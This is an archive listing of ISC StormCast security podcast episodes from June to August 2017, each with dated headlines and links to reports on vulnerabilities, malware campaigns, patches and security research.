Critical HPE iLO Vulnerability http://h20565.www2.hpe.com/hpsc/doc/public/display?docId=hpesbhf03769en_us
Facebook Messenger Spam Leads to Malware https://securelist.com/new-multi-platform-malwareadware-spreading-via-facebook-messenger/81590/
iOS 10.3.1 Kernel Exploit Released https://blog.zimperium.com/ziva-video-audio-ios-kernel-exploit/
Samsung Bricks Smart TVs With Update https://eu.community.samsung.com/t5/TV-Audio-Video/Samsung-MU-Series-2017-Smart-TV-s-will-do-nothing-after-Samsung/td-p/250277
John Bambenek's DGA Feeds http://osint.bambenekconsulting.com/feeds/c2-ipmasterlist.txt
8/25/2017 (12 minutes, 23 seconds)

ISC StormCast for Thursday, August 24th 2017

Malware Loading Avast Safe Zone Browser https://isc.sans.edu/forums/diary/Malicious+script+dropping+an+executable+signed+by+Avast/22748/
Ropemaker E-Mail Content https://www.mimecast.com/globalassets/documents/whitepapers/wp_the_ropemaker_email_exploit.pdf
Cloud Based Accounts Increasingly a Target https://www.microsoft.com/en-us/security/intelligence-report
More Malware Found At Ukrainian Accounting Software Makers https://issp.ua/issp_system_images/UPD_samples_analysis_eng.pdf
8/24/2017 (5 minutes, 44 seconds)

ISC StormCast for Wednesday, August 23rd 2017

Elcomsoft Releases Ability to Retrieve Apple Keychain from iCloud https://www.elcomsoft.com/eppb.html
Mapping Rooms With Smart Speakers http://musicattacks.cs.washington.edu/activity-information-leakage.pdf
Netcraft Identifies .fish Domain Used For Phishing https://news.netcraft.com/archives/2017/08/21/first-fishy-phishing-sites-sighted.html
8/23/2017 (5 minutes, 8 seconds)

ISC StormCast for Tuesday, August 22nd 2017

Hackers Scam $500,000 From Enigma Digital Currency Investors http://www.theregister.co.uk/2017/08/21/enigma_digital_currency_investors_scammed/
Bitcoin Privacy Threats https://arxiv.org/abs/1708.04748
$500 iPhone PIN Brute Forcing Box https://www.youtube.com/watch?v=IXglwbyMydM
SyncCrypt Bypasses Antivirus Filters With Images https://www.bleepingcomputer.com/news/security/synccrypt-ransomware-hides-inside-jpg-files-appends-kk-extension/
8/22/2017 (5 minutes, 47 seconds)

ISC StormCast for Monday, August 21st 2017

EngineBox Banking Malware https://isc.sans.edu/forums/diary/EngineBox+Malware+Supports+10+Brazilian+Banks/22736/
It's Not An Invoice https://isc.sans.edu/forums/diary/Its+Not+An+Invoice/22738/
iOS Secure Enclave Key Posted https://www.theiphonewiki.com/wiki/Greensburg_14G60_%28iPhone6,1%29
Vulnerabilities in Foxit PDF Reader https://www.thezdi.com/blog/2017/8/17/busting-myths-in-foxit-reader
8/20/2017 (5 minutes, 27 seconds)

ISC StormCast for Friday, August 18th 2017

Maldoc with auto-updated link https://isc.sans.edu/forums/diary/Maldoc+with+autoupdated+link/22730/
Rowhammer is Back: SSD Memory Affected https://www.usenix.org/system/files/conference/woot17/woot17-paper-kurmus.pdf
Nathaniel Quist: Active Defense in a Labyrinth of Deception https://www.sans.org/reading-room/whitepapers/ActiveDefense/active-defense-labyrinth-deception-37462
8/18/2017 (16 minutes, 24 seconds)

ISC StormCast for Thursday, August 17th 2017

Analysis of a PayPal Phishing Kit https://isc.sans.edu/forums/diary/Analysis+of+a+Paypal+phishing+kit/22726/
ShadowPad Backdoor in NetSarang Equipment https://securelist.com/shadowpad-in-corporate-networks/81432/
Solving Captcha Audio Challenges http://uncaptcha.cs.umd.edu/papers/uncaptcha_woot17.pdf
8/17/2017 (6 minutes, 20 seconds)

ISC StormCast for Wednesday, August 16th 2017

Malspam Pushing Trickbot Banking Trojan https://isc.sans.edu/forums/diary/Malspam+pushing+Trickbot+banking+Trojan/22720/
Banker Google Chrome Extension Targeting Brazil https://isc.sans.edu/forums/diary/BankerGoogleChromeExtensiontargetingBrazil/22722/
DJI "Go" App May Be Using JSPatch To Modify Applications After Install https://www.rcgroups.com/forums/showpost.php?p=38096850&postcount=2713
Smart Locks Bricked After Auto-Update http://www.securitysales.com/news/smart-locks-lobotomized-failed-update/
8/16/2017 (6 minutes, 3 seconds)

ISC StormCast for Tuesday, August 15th 2017

When A Malicious Looking E-Mail Turns Out to be "just" spam https://isc.sans.edu/forums/diary/Sometimes+its+just+SPAM/22716/
Android iOS Intra-Library Collusion https://arxiv.org/abs/1708.03520
SonicSpy: Android Spyware Apps https://blog.lookout.com/sonicspy-spyware-threat-technical-research
Checking For Breached Passwords in Active Directory https://jacksonvd.com/checking-for-breached-passwords-in-active-directory/
8/15/2017 (6 minutes, 9 seconds)

ISC StormCast for Monday, August 14th 2017

Outlook Web Access Based Attacks https://isc.sans.edu/forums/diary/Outlook+Web+Access+based+attacks/22710/
The Good Phishing Email https://isc.sans.edu/forums/diary/The+Good+Phishing+Email/22712/
Git/CVS/Mercurial and others: ssh vulnerability http://blog.recurity-labs.com/2017-08-10/scm-vulns
PostgreSQL Vulnerabilities https://bugzilla.redhat.com/show_bug.cgi?id=1477185
8/14/2017 (5 minutes, 40 seconds)

ISC StormCast for Friday, August 11th 2017

Maldoc Analysis With ViperMonkey https://isc.sans.edu/forums/diary/Maldoc+Analysis+with+ViperMonkey/22702/
Microsoft Joins Google/Mozilla in Banishing WoSign and StartCom From Trusted CA List https://blogs.technet.microsoft.com/mmpc/2017/08/08/microsoft-to-remove-wosign-and-startcom-certificates-in-windows-10/
SMS Touch App Leaking Messages https://www.zscaler.com/blogs/research/mobile-app-wall-shame-sms-touch
Mac Adware Mughthesec https://objective-see.com/blog/blog_0x20.html
8/11/2017 (5 minutes, 46 seconds)

ISC StormCast for Thursday, August 10th 2017

DirectDefense Accuses Carbon Black of Data Leak https://www.carbonblack.com/2017/08/09/directdefense-incorrectly-asserts-architectural-flaw-in-cb-response/ https://www.directdefense.com/harvesting-cb-response-data-leaks-fun-profit/
Vulnerabilities in Solar Generation https://horusscenario.com
Hunting Malicious npm Packages https://duo.com/blog/hunting-malicious-npm-packages
8/10/2017 (6 minutes, 52 seconds)

ISC StormCast for Wednesday, August 9th 2017

Microsoft Updates https://isc.sans.edu/forums/diary/Microsoft+Patch+Tuesday+August+2017/22694/
Adobe Updates https://helpx.adobe.com/security.html
Android Patches https://source.android.com/security/bulletin/2017-08-01
How Are People Fooled By This? Email To Sign a Contract Provides Malware https://isc.sans.edu/forums/diary/How+are+people+fooled+by+this+Email+to+sign+a+contract+provides+malware+instead/22696/
8/9/2017 (5 minutes, 57 seconds)

ISC StormCast for Tuesday, August 8th 2017

PHPMyAdmin Scans https://isc.sans.edu/forums/diary/Increase+of+phpMyAdmin+scans/22688/ Hotspot Shield Leakes Private User Data https://cdt.org/files/2017/08/FTC-CDT-VPN-complaint-8-7-17.pdf Debian Turning Off Support for TLS 1.0/1.1 https://lists.debian.org/debian-devel-announce/2017/08/msg00004.html Ongoing Phishing Attacks Against Google Chrome Plugin Developers https://www.bleepingcomputer.com/news/security/chrome-extension-developers-under-a-barrage-of-phishing-attacks/
8/7/2017, 5 minutes, 43 seconds

ISC StormCast for Monday, August 7th 2017

Opengraph Used to Obfuscate Facebook Links https://isc.sans.edu/forums/diary/Use+of+the+Open+Graph+Protocol+to+Disguise+Malicious+Facebook+Links/22684/ Cerber Adding Bitcoin and Password Stealer to Crypto Ransomware http://blog.trendmicro.com/trendlabs-security-intelligence/cerber-ransomware-evolves-now-steals-bitcoin-wallets/ Symantec Selling Certificate Business To Digicert https://www.heise.de/security/meldung/Nachspiel-einer-fatalen-Panne-Symantec-verkauft-Zertifikatssparte-an-DigiCert-3793482.html Siemens Medical Imaging Systems Vulnerable to Old Windows Flaws https://www.siemens.com/cert/pool/cert/siemens_security_advisory_ssa-822184.pdf
8/7/2017, 6 minutes, 13 seconds

ISC StormCast for Friday, August 4th 2017

Raspberry Pi Honeypot https://github.com/DShield-ISC/dshield Troy Hunt Releases Password List https://haveibeenpwned.com/Passwords Typosquatting npm Packages http://blog.npmjs.org/post/163723642530/crossenv-malware-on-the-npm-registry SEC503: Intrusion Detection in Depth Berlin (Oct 23rd-28th) https://www.sans.org/event/berlin-2017/course/intrusion-detection-in-depth
8/4/2017, 5 minutes, 50 seconds

ISC StormCast for Thursday, August 3rd 2017

Attacking NoSQL Applications https://isc.sans.edu/forums/diary/Attacking+NoSQL+applications+part+2/22676/ Web Developer Chrome Toolbar Replaced with AdWare https://twitter.com/chrispederick Android Banking Trojans https://securelist.com/a-new-era-in-mobile-banking-trojans/79198/ Amazon Stops Selling Blu Smartphones http://www.zdnet.com/article/amazon-halts-blu-phone-sales-over-potential-security-issue/
8/2/2017, 5 minutes, 21 seconds

ISC StormCast for Wednesday, August 2nd 2017

Detect SMB Versions with nmap https://isc.sans.edu/forums/diary/Rooting+Out+Hosts+that+Support+Older+Samba+Versions/22672/ CopyFish Google Chrome Extension Replaced by Adware https://a9t9.com/blog/chrome-extension-adware/ StartCom Applying to be Included in Mozilla SSL CAs again https://bugzilla.mozilla.org/show_bug.cgi?id=1311832#c12 McAfee Uses Mixed SSL/nonSSL Content For Online Malware Scan https://blogs.securiteam.com/index.php/archives/3350 Netflix Releases DoS Testing Tool https://medium.com/netflix-techblog/starting-the-avalanche-640e69b14a06
8/2/2017, 6 minutes, 18 seconds

ISC StormCast for Tuesday, August 1st 2017

MSFT Re-Releases June Outlook Update https://support.office.com/en-us/article/Outlook-known-issues-in-the-June-2017-security-updates-3f6dbffd-8505-492d-b19f-b3b89369ed9b?ui=en-US&rs=en-US&ad=US&fromAR=1 Iranian Hackers Use Social Media To Collect Data https://www.darkreading.com/attacks-breaches/iranian-hackers-ensnared-targets-via-phony-female-photographer/d/d-id/1329502?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple ShieldFS Self Healing Filesystem http://shieldfs.necst.it/continella-shieldfs-2016.pdf
8/1/2017, 5 minutes, 40 seconds

ISC StormCast for Monday, July 31st 2017

SMBloris DoS Attack Locks Up Windows https://twitter.com/jennamagius/status/891434286212984832 https://isc.sans.edu/forums/diary/SMBLoris+the+new+SMB+flaw/22662/ Text Banking Attacks https://isc.sans.edu/forums/diary/Text+Banking+Scams/22666/ Nissan Leaf WiFi Vulnerability https://github.com/HackingThings/Publications/blob/cdb72df7c3feffd02593a31d67a34ae353b09114/2017/DC25_Driving%20down%20the%20rabbit%20hole-Mickey_Jesse_Oleksander.pdf
7/31/2017, 5 minutes, 48 seconds

ISC StormCast for Friday, July 28th 2017

Targeting HTTP's Hidden Attack-Surface http://blog.portswigger.net/2017/07/cracking-lens-targeting-https-hidden.html Petya/Goldeneye Decrypter https://blog.malwarebytes.com/malwarebytes-news/2017/07/bye-bye-petya-decryptor-old-versions-released/ TinyPot, My Small Honeypot https://isc.sans.edu/forums/diary/TinyPot+My+Small+Honeypot/22654/ Shaun McCullough https://www.sans.org/reading-room/whitepapers/testing/docker-create-multi-container-environments-research-sharing-lateral-movement-37855
7/28/2017, 13 minutes, 32 seconds

ISC StormCast for Thursday, July 27th 2017

Malspam Pushing Emotet Malware https://isc.sans.edu/forums/diary/Malspam+pushing+Emotet+malware/22650/ Broadpwn Released http://blog.exodusintel.com/2017/07/26/broadpwn/ Microsoft Announces Windows 10 Bug Bounty https://blogs.technet.microsoft.com/msrc/2017/07/26/announcing-the-windows-bounty-program/ Custom Map Vulnerability in Valve Games https://oneupsecurity.com/research/remote-code-execution-in-source-games
7/27/2017, 5 minutes, 11 seconds

ISC StormCast for Wednesday, July 26th 2017

Adobe Announces End of Flash for 2020 https://blogs.adobe.com/conversations/2017/07/adobe-flash-update.html JA3 Hash To Fingerprint SSL/TLS Connections https://github.com/salesforce/ja3 https://engineering.salesforce.com/open-sourcing-ja3-92c9e53c3c41 New Wave of Apple iCloud Ransom Attacks https://www.heise.de/mac-and-i/meldung/Erneut-iCloud-Erpressungswelle-ueber-Meinen-Mac-suchen-und-Mein-iPhone-suchen-3782075.html
7/26/2017, 5 minutes, 45 seconds

ISC StormCast for Tuesday, July 25th 2017

Uber Drivers Targeted in Social Engineering Scam https://isc.sans.edu/forums/diary/Uber+drivers+new+threat+the+passenger/22626/ Mac Malware FruitFly2 https://motherboard.vice.com/en_us/article/zmv79w/mysterious-mac-malware-has-infected-hundreds-of-victims-for-years Exploit Released for Critical Netscaler SD WAN 9.1.2 Vulnerability http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-6316
7/25/2017, 7 minutes, 15 seconds

ISC StormCast for Monday, July 24th 2017

Malicious .iso Attachments https://isc.sans.edu/forums/diary/Malicious+iso+Attachments/22636/ Maldoc with .lnk File https://isc.sans.edu/forums/diary/Another+lnk+File/22640/ Large Ethereum Hack http://hackingdistributed.com/2017/07/22/deep-dive-parity-bug/
7/24/2017, 5 minutes, 2 seconds

ISC StormCast for Friday, July 21st 2017

Symantec Sloppy Key Verification Leads To Revocation of Certificates https://blog.hboeck.de/archives/888-How-I-tricked-Symantec-with-a-Fake-Private-Key.html Gnome Thumbnailer Executes Code http://news.dieweltistgarnichtso.net/posts/gnome-thumbnailer-msi-fail.html
7/21/2017, 11 minutes

ISC StormCast for Thursday, July 20th 2017

Bots Searching for Keys and Config Files https://isc.sans.edu/forums/diary/Bots+Searching+for+Keys+Config+Files/22630/ Apple Updates Everything https://support.apple.com/en-us/HT201222 Trend Micro Sees SambaCry Exploits http://blog.trendmicro.com/trendlabs-security-intelligence/linux-users-urged-update-new-threat-exploits-sambacry/ Google Increases Developer Scrutiny https://developers.googleblog.com/2017/05/updating-developer-identity-guidelines.html
7/20/2017, 6 minutes, 1 second

ISC StormCast for Wednesday, July 19th 2017

Oracle Quarterly Critical Patch Update http://www.oracle.com/technetwork/security-advisory/cpujul2017verbose-3236625.html Cisco WebEx Plugin Update https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170717-webex https://bugs.chromium.org/p/project-zero/issues/detail?id=1324&desc=2 Node.JS DoS Vulnerability https://nodejs.org/en/blog/vulnerability/july-2017-security-releases/ Bitdefender Remote Stack Buffer Overflow https://landave.io/2017/07/bitdefender-remote-stack-buffer-overflow-via-7z-ppmd/ Coindash Hack https://twitter.com/coindashio/status/886936799695818752 https://www.coindash.io DowJones Leaks Customer Data via S3 Buckets https://www.upguard.com/breaches/cloud-leak-dow-jones
7/19/2017, 5 minutes, 46 seconds

ISC StormCast for Tuesday, July 18th 2017

SMS Phishing Asks Victims to Upload Picture of Token Card https://isc.sans.edu/forums/diary/SMS+Phishing+induces+victims+to+photograph+its+own+token+card/22616/ Critical FreeRADIUS Update https://guidovranken.wordpress.com/2017/07/17/11-remote-vulnerabilities-inc-2x-rce-in-freeradius-packet-parsers/ OS X Malware Installs Crypto Messenger Signal https://blog.checkpoint.com/2017/07/13/osxdok-refuses-go-away-money/
7/18/2017, 5 minutes, 45 seconds

ISC StormCast for Monday, July 17th 2017

NemucodAES UPS Malspam https://isc.sans.edu/forums/diary/NemucodAES+and+the+malspam+that+distributes+it/22614/ Analyzing Malicious Office Document With LNK https://isc.sans.edu/forums/diary/Office+maldoc+lnk/22618/ Gandi Breach Leads to Domain Compromise https://news.gandi.net/en/2017/07/detailed-incident-report/ iSmart Alarm Vulnerabilities http://dojo.bullguard.com/blog/burglar-hacker-when-a-physical-security-is-compromised-by-iot-vulnerabilities/
7/17/2017, 5 minutes, 25 seconds

ISC StormCast for Friday, July 14th 2017

Malware Loads ffmpeg For Video Recording Features https://blog.malwarebytes.com/threat-analysis/2017/07/malware-abusing-ffmpeg/ Password Managers and Cloud Storage https://discussions.agilebits.com/discussion/76956/can-i-still-buy-standalone-license-for-the-1password-no-longer-being-marketed/p8 SAP Point of Sales Express Patch https://erpscan.com/press-center/blog/sap-cyber-threat-intelligence-report-july-2017/ Roderick Currie: Car Hacking Developments https://www.sans.org/reading-room/whitepapers/internet/developments-car-hacking-36607
7/13/2017, 14 minutes, 56 seconds

ISC StormCast for Thursday, July 13th 2017

Simple File Integrity Monitoring With Backup Scripts https://isc.sans.edu/forums/diary/Backup+Scripts+the+FIM+of+the+Poor/22606/ Ethereum Wallet Services Targeted By Scammers http://www.ibtimes.co.uk/ethereum-under-siege-scammers-make-700000-6-days-slack-reddit-phishing-attacks-1629866 MongoDB Security Surprises For Shared Hosting https://medium.com/@alexbyk/mongodb-at-shared-hosting-security-surprises-c441ecb84b54 Trend Micro Vulnerabilities https://www.coresecurity.com/advisories/trend-micro-deep-discovery-director-multiple-vulnerabilities
7/12/2017, 5 minutes, 45 seconds

ISC StormCast for Wednesday, July 12th 2017

Microsoft Patch Tuesday https://isc.sans.edu/diary//22602 AT&T Cell Phone Takeover https://carpeaqua.com/2017/07/07/hack-the-planet/ Systemd Invalid Username Bug To Be Fixed https://github.com/systemd/systemd/pull/6300
7/11/2017, 5 minutes, 33 seconds

ISC StormCast for Tuesday, July 11th 2017

Takeover of .io TLD https://thehackerblog.com/the-io-error-taking-control-of-all-io-domains-with-a-targeted-registration/ Malwarebytes Quarterly Malware Report https://www.malwarebytes.com/pdf/white-papers/CybercrimeTacticsAndTechniques-Q2-2017.pdf OpenBSD Introducing KARL To Randomize Kernel Layout at Boot https://marc.info/?l=openbsd-tech&m=149732026405941&w=2
7/10/2017, 5 minutes, 39 seconds

ISC StormCast for Monday, July 10th 2017

More DDoS Ransom Demands https://isc.sans.edu/forums/diary/Adversary+hunting+with+SOFELK/22592/ Adversary Hunting With SOF-ELK https://isc.sans.edu/forums/diary/Adversary+hunting+with+SOFELK/22592/ Petya Master Key Published https://twitter.com/JanusSecretary/status/882663988429021184?ref_src=twsrc%5Etfw&ref_url=https%3A%2F%2Fwww.bleepingcomputer.com%2Fnews%2Fsecurity%2Fauthor-of-original-petya-ransomware-publishes-master-decryption-key%2F Template Attacks Against Critical Infrastructure http://blog.talosintelligence.com/2017/07/template-injection.html
7/9/2017, 5 minutes, 56 seconds

ISC StormCast for Friday, July 7th 2017

Finding Odd Domain Names https://isc.sans.edu/forums/diary/Selecting+domains+with+random+names/22580/ BitTorrent Sync 2.0 Log Files https://isc.sans.edu/forums/diary/Investigation+of+BitTorrent+Sync+v20+as+a+P2P+Cloud+Service+Part+2+Log+Files+artefacts/22582/ Cisco Vulnerabilities https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170705-esc2 Finding Weak Password Hashing Algorithms Via Hash Collisions https://www.netsparker.com/blog/web-security/collision-based-hashing-algorithm-disclosure/ BIND TSIG Exploit http://www.synacktiv.ninja/ressources/CVE-2017-3143_BIND9_TSIG_dynamic_updates_vulnerability_Synacktiv.pdf
7/6/2017, 5 minutes, 32 seconds

ISC StormCast for Thursday, July 6th 2017

AVTest Report: Ransomware not a big deal; Android/MacOS Catching up to Windows https://www.av-test.org/fileadmin/pdf/security_report/AV-TEST_Security_Report_2016-2017.pdf Microsoft Will Prompt Users to Update Windows 10 https://support.microsoft.com/en-us/help/4023814 Bithumb Bitcoin Exchange Hacked (Article in Korean) http://bithumb.cafe/archives/7329 Turkish Airlines and Emirates Remove Laptop Ban http://www.theregister.co.uk/2017/07/05/emirates_and_turkish_airlines_lift_laptop_ban_on_us_flights/ Ukrainian Authorities Raid MeDoc (Article in Ukrainian) https://cyberpolice.gov.ua/news/prykryttyam-najmasshtabnishoyi-kiberataky-v-istoriyi-ukrayiny-stav-virus-diskcoderc-881/
7/5/2017, 4 minutes, 50 seconds

ISC StormCast for Wednesday, July 5th 2017

Microsoft Patches Skype Vulnerability https://www.vulnerability-lab.com/get_content.php?id=2071 SystemD Invalid Username Bug Not Considered a Vulnerability (or Bug) https://github.com/systemd/systemd/issues/6237 Cisco Fixes SNMP Vulnerability in IOS and IOS XE https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170629-snmp Smartphones Can Be Compromised with shady replacement parts https://iss.oy.ne.ro/Shattered Siemens Fixes Intel AMT Bug https://www.siemens.com/cert/pool/cert/siemens_security_advisory_ssa-874235.pdf Update For libgcrypt https://www.ubuntuupdates.org/package/core/zesty/main/updates/libgcrypt20-dev
7/4/2017, 5 minutes, 55 seconds

ISC StormCast for Friday, June 30th 2017

Catching up With Blank Slate https://isc.sans.edu/forums/diary/Catching+up+with+Blank+Slate+a+malspam+campaign+still+going+strong/22570/ Azure AD Connect Vulnerability https://technet.microsoft.com/library/security/4033453.aspx#ID0EN Exploit Available For Stack Clash Vulnerability https://www.qualys.com/research/security-advisories/ Paul Herschberger: Data Breach Impact Estimation https://www.sans.org/reading-room/whitepapers/dlp/data-breach-impact-estimation-37502
6/30/2017, 15 minutes, 7 seconds

ISC StormCast for Thursday, June 29th 2017

Petya Ransomware Update https://isc.sans.edu/forums/diary/Petya+I+hardly+know+ya+an+ISC+update+on+the+20170627+ransomware+outbreak/22566/ Ubuntu systemd Vulnerability https://www.ubuntu.com/usn/usn-3341-1/ Microsoft Will Include EMET in Windows 10 https://blogs.technet.microsoft.com/mmpc/2017/06/27/whats-new-in-windows-defender-atp-fall-creators-update/ BGP Attacks Against Bitcoin https://blog.acolyer.org/2017/06/27/hijacking-bitcoin-routing-attacks-on-cryptocurrencies/
6/29/2017, 5 minutes, 37 seconds

ISC StormCast for Wednesday, June 28th 2017

Petya/Goldeneye Variant Makes the Rounds https://isc.sans.edu/forums/diary/Checking+out+the+new+Petya+variant/22562/
6/28/2017, 5 minutes, 7 seconds

ISC StormCast for Tuesday, June 27th 2017

Investigation of BitTorrent Sync (v.2.0) as a P2P Cloud (Part 1) https://isc.sans.edu/forums/diary/Investigation+of+BitTorrent+Sync+v20+as+a+P2P+Cloud+Part+1/22554/ Ransomware Payment Spurs More DDoS Ransomware Attacks https://www.bleepingcomputer.com/news/security/-1-million-ransomware-payment-has-spurred-new-ddos-for-bitcoin-attacks/ Speed Trap Cameras in Australia Infected with WannaCrypt http://www.camerassavelives.vic.gov.au/utility/latest+news/investigation+underway+into+cameras+affected+by+software+virus More Vulnerabilities in Windows Defender https://bugs.chromium.org/p/project-zero/issues/detail?id=1282&desc=2 npm Developer Accounts Reset After Password Reuse Discovery https://github.com/ChALkeR/notes/blob/master/Gathering-weak-npm-credentials.md
6/27/2017, 6 minutes, 16 seconds

ISC StormCast for Monday, June 26th 2017

Fake DDoS Extortions Continue https://isc.sans.edu/forums/diary/Fake+DDoS+Extortions+Continue+Please+Forward+Us+Any+Threats+You+Have+Received/22550/
Traveling with a Laptop https://isc.sans.edu/forums/diary/Traveling+with+a+Laptop+Surviving+a+Laptop+Ban+How+to+Let+Go+of+Precious/22462/
Side Channel Attacks on the Cheap https://www.fox-it.com/nl/wp-content/uploads/sites/12/Tempest_attacks_against_AES.pdf
Latest Locky Variant Hunting Down Windows XP Users http://blog.talosintelligence.com/2017/06/necurs-locky-campaign.html
Windows Beta Builds and Source Code Leaked http://www.theregister.co.uk/2017/06/23/windows_10_leak/
6/25/2017, 6 minutes, 36 seconds

ISC StormCast for Friday, June 23rd 2017

Obfuscating Without XOR https://isc.sans.edu/forums/diary/Obfuscating+without+XOR/22544/
Airbnb OAuth Token Theft https://www.arneswinnen.net/2017/06/authentication-bypass-on-airbnb-via-oauth-tokens-theft/
Critical Drupal Vulnerability https://www.drupal.org/SA-CORE-2017-003
Auditing Docker Containers https://www.sans.org/reading-room/whitepapers/auditing/checklist-audit-docker-containers-37437
6/23/2017, 11 minutes, 55 seconds

ISC StormCast for Thursday, June 22nd 2017

New Vulnerabilities Found in OpenVPN https://guidovranken.wordpress.com/2017/06/21/the-openvpn-post-audit-bug-bonanza/
RAR Unpack Vulnerability Affects BitDefender https://bugs.chromium.org/p/project-zero/issues/detail?id=1278&desc=6
Honda Plant Shuts Down Over WannaCry https://www.bleepingcomputer.com/news/security/one-month-later-wannacry-ransomware-is-still-shutting-down-factories/
6/22/2017, 5 minutes

ISC StormCast for Wednesday, June 21st 2017

Cisco Ships Private Key For drmlocal.cisco.com With Video Player https://groups.google.com/forum/#!topic/mozilla.dev.security.policy/T6emeoE-lCU
Windows Error Reporting: DFIR Benefits and Privacy Concerns https://isc.sans.edu/forums/diary/Windows+Error+Reporting+DFIR+Benefits+and+Privacy+Concerns/22536/
Detecting Memory Corruption in glibc https://github.com/DhavalKapil/libdheap
Let's Encrypt ACME Protocol To Become IETF Standard https://tools.ietf.org/html/draft-ietf-acme-acme-06
Microsoft Publishes Analysis of NSA Exploits https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/
6/21/2017, 5 minutes, 52 seconds

ISC StormCast for Tuesday, June 20th 2017

Stack Clash Vulnerability Affects Various Unix Based Operating Systems https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
Separation Of Duties / Malicious Administrators https://isc.sans.edu/forums/diary/As+Your+Admin+Walks+Out+the+Door/22530/
Progress in Satellite Based Quantum Cryptography https://www.wired.com/story/chinese-satellite-relays-a-quantum-signal-between-cities/ https://www.helpnetsecurity.com/2017/06/19/extremely-secure-data-encryption/
Women Connect Event Minneapolis: https://www.sans.org/event/minneapolis-2017/bonus-sessions/12162
6/20/2017, 7 minutes, 19 seconds

ISC StormCast for Monday, June 19th 2017

Uptick in Port 83 Traffic https://isc.sans.edu/forums/diary/What+is+going+on+with+Port+83/22524/
WINS DoS Vulnerability Will Not Be Fixed by Microsoft https://blog.fortinet.com/2017/06/14/wins-server-remote-memory-corruption-vulnerability-in-microsoft-windows-server
Microsoft to Release Patch to Turn off SMB1 https://www.bleepingcomputer.com/news/microsoft/microsoft-to-disable-smbv1-in-windows-starting-this-fall/
UK Hacker Stole Personnel Data For US Military Satellite Network https://public-newsroom-nca-01.azurewebsites.net/news/hacker-stole-satellite-data-from-us-department-of-defence
Sophos Web Appliance Will Now Update via HTTPS https://community.sophos.com/products/web-appliance/b/blog/posts/release-of-swa-v4-3-2---security-and-defect-fix-rollup
6/19/2017, 5 minutes, 22 seconds

ISC StormCast for Friday, June 16th 2017

WikiLeaks Releases Documents About Cherry Blossom Wifi Hacking Toolkit https://wikileaks.org/vault7/#Cherry%20Blossom
More DVR Vulnerabilities https://www.pentestpartners.com/security-blog/what-did-mirai-miss-making-a-better-bigger-botnet/
More Microsoft Windows Defender Vulnerabilities http://www.theregister.co.uk/2017/06/15/microsoft_how_about_sandboxing_windows_defenders_engine/
Decryption Utility For Jaff Crypto Ransomware https://noransom.kaspersky.com
Preston Ackerman: Two Factor Authentication by Home End-Users https://www.sans.org/reading-room/whitepapers/authentication/impediments-adoption-two-factor-authentication-home-end-users-37607
6/16/2017, 18 minutes, 8 seconds

ISC StormCast for Thursday, June 15th 2017

Systemd Odd Defaults https://isc.sans.edu/forums/diary/Systemd+Could+Fallback+to+Google+DNS/22516/
Voice over LTE Vulnerabilities https://www.sstic.org/media/SSTIC2017/SSTIC-actes/remote_geolocation_and_tracing_of_subscribers_usin/SSTIC2017-Article-remote_geolocation_and_tracing_of_subscribers_using_4g_volte_android_phone-le-moal_ventuzelo_coudray.pdf
Tails 3.0 Released https://tails.boum.org/install/download/index.en.html
Nexus 9 Headphone Jack Vulnerability https://alephsecurity.com/2017/06/13/nexus9-ephemeral-fiq/
6/14/2017, 6 minutes, 25 seconds

ISC StormCast for Wednesday, June 14th 2017

MSFT June Patchday Fixes Remaining Known NSA Vulnerabilities https://isc.sans.edu/forums/diary/Microsoft+and+Adobe+June+2017+Patch+Tuesday+Two+Exploited+Vulnerabilities+Patched/22512/
North Korea Building DDoS Botnet https://www.us-cert.gov/ncas/alerts/TA17-164A
6/14/2017, 6 minutes, 29 seconds

ISC StormCast for Tuesday, June 13th 2017

Industroyer / CrashOverride Malware Analysis From Power System Attacks https://www.welivesecurity.com/2017/06/12/industroyer-biggest-threat-industrial-control-systems-since-stuxnet/ https://dragos.com/blog/crashoverride/CrashOverride-01.pdf
MacSpy Spyware As A Service For Macs http://www.alienvault.com/blogs/labs-research/macspy-os-x-rat-as-a-service
VolUtility Memory Analysis Made Easy https://isc.sans.edu/forums/diary/An+Introduction+to+VolUtility/22508/
Google News Abused For Spam http://www.theregister.co.uk/2017/06/12/googles_news_algorithm_serves_up_penis_pills_for_all/
6/13/2017, 5 minutes, 54 seconds

ISC StormCast for Monday, June 12th 2017

SAMBA Vulnerability Exploited To Install Bitcoin Miners https://securelist.com/78674/sambacry-is-coming/
Intel's AMT Technology Used For Covert Channel https://blogs.technet.microsoft.com/mmpc/2017/06/07/platinum-continues-to-evolve-find-ways-to-maintain-invisibility/
Broadcom Vulnerabilities to be Announced https://www.blackhat.com/us-17/briefings.html#broadpwn-remotely-compromising-android-and-ios-via-a-bug-in-broadcoms-wi-fi-chipsets
Release Lag In National Vulnerability Database https://www.recordedfuture.com/vulnerability-disclosure-delay/
6/12/2017, 5 minutes, 55 seconds

ISC StormCast for Friday, June 9th 2017

Cisco Prime Data Center Network Manager Vulnerabilities https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170607-dcnm1 https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170607-dcnm2
Oracle Peoplesoft Default Accounts https://erpscan.com/press-center/blog/peoplesoft-default-accounts/
FOSCAM Camera Default Passwords and Other Vulnerabilities http://images.news.f-secure.com/Web/FSecure/%7B43df9e0d-20a8-404a-86d0-70dcca00b6e5%7D_vulnerabilities-in-foscam-IP-cameras_report.pdf
Android Malware With Code Injections https://securelist.com/78648/dvmap-the-first-android-malware-with-code-injection/
STI Student John Dittmer: Legal Implications of Vulnerability Scans https://www.sans.org/reading-room/whitepapers/legal/minimizing-legal-risk-cybersecurity-scanning-tools-37522
6/9/2017, 12 minutes, 32 seconds

ISC StormCast for Thursday, June 8th 2017

Deceptive Advertisements: What They Do And Where They Come From https://isc.sans.edu/forums/diary/Deceptive+Advertisements+What+they+do+and+where+they+come+from/22494/
Instagram as Covert Channel https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/
